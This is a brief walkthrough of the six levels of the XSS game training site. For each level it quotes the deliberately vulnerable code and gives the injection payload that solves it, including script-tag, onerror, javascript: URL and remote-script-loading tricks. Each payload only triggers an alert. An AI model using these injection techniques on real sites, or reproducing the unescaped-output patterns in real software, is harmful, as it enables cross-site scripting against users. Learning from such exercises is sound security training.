[1/6]  Level 1: Hello, world of XSS

bug:

      message = "Sorry, no results were found for <b>" + query + "</b>."
      message += " <a href='?'>Try again</a>."
      # Display the results page
      self.render_string(page_header + message + page_footer)

exp: <script>alert(/xss/)</script>

[2/6]  Level 2: Persistence is key

bug:

 html += "<blockquote>" + posts[i].message + "</blockquote";
......
 var message = document.getElementById('post-content').value;

exp:<img src=1 onerror=”alert(/xss/)”>

[3/6]  Level 3: That sinking feeling…

bug:

    html += "<img src='/static/level3/cloud" + num + ".jpg' />";

exp:https://xss-game.appspot.com/level3/frame#2xss’ onerror=”alert(/xss/)”

[4/6]  Level 4: Context matters

bug:

<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />

exp:3′);alert(‘xss

[5/6]  Level 5: Breaking protocol

bug: https://xss-game.appspot.com/level5/frame/signup?next=confirm

<a href="{{ next }}">Next >></a>

we can change the ‘next’ parameter.
exp:https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(/xss/)
then click go,and input email or everything

[6/6]  Level 6: Follow the 🐇

bug: if (url.match(/^https?:\/\//)) {—————–bypass:t-T

scriptEl.src = url;
      // Show log messages
      scriptEl.onload = function() {
        setInnerText(document.getElementById("log"),
          "Loaded gadget from " + url);
......
// Take the value after # and use it as the gadget filename.
    function getGadgetName() {
      return window.location.hash.substr(1) || "/static/gadget.js";
    }
    includeGadget(getGadgetName());

we can change the url to include our script
exp:https://xss-game.appspot.com/level6/frame#hTTps://www.google.com/jsapi?callback=alert

(If you use http,it will output Couldn’t load gadget from …….,because it must use https,so you should use a https’s website to include your evil script,I think it is very very sly.)

---

Colorful egg: